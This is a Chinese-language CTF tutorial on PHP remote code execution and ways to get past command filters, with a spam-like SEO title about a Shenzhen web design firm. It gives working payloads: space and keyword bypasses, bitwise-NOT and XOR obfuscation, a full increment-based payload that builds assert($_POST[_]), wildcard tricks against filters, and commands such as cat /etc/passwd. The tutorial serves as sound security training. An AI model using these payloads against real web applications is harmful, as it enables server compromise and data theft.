深圳网站设计兴田德润信任高网络推广有哪几种方法
1,What is RCE?
在CTF(Capture The Flag)竞赛中,RCE漏洞指的是远程代码执行漏洞(Remote Code Execution)。这类漏洞允许攻击者通过某种方式在目标系统上执行任意代码,从而完全控制目标系统或获取敏感信息。RCE漏洞通常是非常严重的漏洞,因为它们可以直接导致系统被攻陷。
2,How to find a RCE?
要能执行漏洞,那就肯定要了解能执行漏洞的函数
1.系统命令执行函数
- system():能将字符串作为OS命令执行,且返回命令执行结果;
- exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显);
- shell_exec():能将字符串作为OS命令执行
- passthru():能将字符串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;
- popen():打开进程文件指针
- proc_open():与popen()类似
- pcntl_exec():在当前进程空间执行指定程序;
- 反引号``:反引号``内的字符串会被解析为OS命令;
2.代码执行函数
- eval():将字符串作为php代码执行;
- assert():将字符串作为php代码执行;
- preg_replace():正则匹配替换字符串;
- create_function():主要创建匿名函数;
- call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数;
- call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组;
- 可变函数:若变量后有括号,该变量会被当做函数名为变量值(前提是该变量值是存在的函数名)的函数执行;
For example
[SWPUCTF 2021 新生赛]babyrce
从php代码可以知道要让admin的cookie等于1
然后尝试访问这个php文件
一个典型的rce注入,过滤了空格,可以用$IFS$6绕过
然后我们就可以进行命令执行,在根目录下找到了flag
这样一道简单的RCE就做完了(我说白了,我白说了,这才像新生题)
这样也可以看出来,RCE就是靶机上会给出命令执行函数(一般情况下),再加上一些过滤就构成了一般的RCE(二般的我不敢说话)
3,RCE by pass
由此可见RCE的绕过方式相当重要,那我问你,你学不学
1,逻辑运算符
由于php是在c语言上衍生的一门编程语言,所以逻辑运算符是与c差不多的
| 逻辑运算符 | 例子 | 描述 |
| & | A&B | 执行A和B |
| && | A&&B | 当A为真时执行B |
| ; | A;B | 从左到右执行AB |
| | | A|B | 显示B的执行结果 |
| || | A||B | 当A为假时执行B |
以pikachu靶场为例(因为靶机时windows系统,所以用dir查看命令
(| 只显示后一个命令的执行)
(&两个都执行 )
2,空格绕过
这里有如下几种方式
- $IFS$6,${IFS}
- < 重新定向符 例子 cat</etc/passwd
- \t,%09(水平制表符)
- %20,\x20 url解码和16进制中的空格
例题 [MoeCTF 2021]babyRCE
可以看到过滤了空格和一些系统命令,这里的空格只有用第一中方式
然后cat等命令用下面要将的反斜杠绕过
3,反斜杠\绕过
如上题所示,当面对一些系统命令被过滤掉,而反斜杠没有被过滤,就可以用这钟绕过
如 cat-->c\at flag-->fl\ag
4,取反绕过
什么是去取反?
php语言中"~$a"会将变量a的值取反将字符或字符串进行按位取反,从而生成新的字符或字符串。(比如0101 --> 1010)
而利用方法就是先取反,在取回来就行了(适用于~没有被过滤)
所以就可以用
?cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);
作为传递的参数
5,异或绕过
我们都知道异或运算符^
而效果就是 1001^0111=1110 即对应位相同为0,不同为1,而且这个运算是可逆的
所以我们可以通过用异或运算的方法来绕过
比如 a='system'^'whatcanisay'
那我们要得到system就要传入a^'whatcanisay'就行了
6,自增绕过
这个相当有趣
比如我们令$_=[],这样就会得到一个名为_的空数组
而在php中,创建数组用Array
那我们输出echo "$_"会怎么样
这样就从无字符到有字符了,再用$_="$_",配合上@==&返回0,所以就能访问到A
再将A赋值给$_,并自增
现在发现$_变成了B(ASCII值+1)
原理懂了我们直接看payload
//自增payload,assert($_POST[_]),命令传入_$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);&_=phpinfo();这不就稳稳拿下了吗
7,变量拼接
有些时候我们也可以自己命名一个变量
比如变量cmd中会正则匹配flag字符串
那我们就可以传入?a=flag&cmd=cat $a
同时也可以字符串拼接,比如s.y.s.t.e.m
8,base和hex编码绕过
之前学的管道符|就发挥作用了,比如我我们将system用base64编码,传入后再用base64解码不久可以了吗?
总之,这两种方法的思想无异于就是先转为16进制或者base再转回来
9,正则匹配绕过
//如flag被过滤
cat /f???
cat /fl*
cat /f[a-z]{3}这三种都是shell通配符
10,引号绕过
//如cat、ls被过滤
ca""t /flag
l's' /感觉与反斜杠绕过同理,就是将关键词分隔开
11,命令替换
如果cat被过滤了还可以用如下的东西替代
12,回溯绕过
适用于php正则匹配绕过
//php正则的回溯次数大于1000000次时返回False
$a = 'hello world'+'h'*1000000
preg_match("/hello.*world/is",$a) == False13,无回显RCE
//无回显RCE,如exce()函数,可将执行结果输出到文件再访问文件执行以下命令后访问1.txt即可
ls / | tee 1.txt
cat /flag | tee 2.txt
//eval()无输出
eval(print`c\at /flag`;)